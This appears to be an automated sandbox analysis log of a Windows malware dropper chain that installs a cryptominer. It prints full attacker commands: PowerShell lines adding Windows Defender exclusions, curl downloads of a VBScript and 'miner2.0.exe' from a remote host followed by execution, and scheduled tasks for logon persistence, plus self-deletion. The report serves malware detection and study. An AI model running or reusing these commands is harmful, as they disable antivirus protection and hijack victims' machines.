Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401E9E puts,ShellExecuteExA,ShellExecuteExA,GetLastError,puts,printf,WaitForSingleObject,CloseHandle,

7_2_00401E9E

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401550 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_00401550

Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C3D312 cpuid

6_2_00C3D312

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
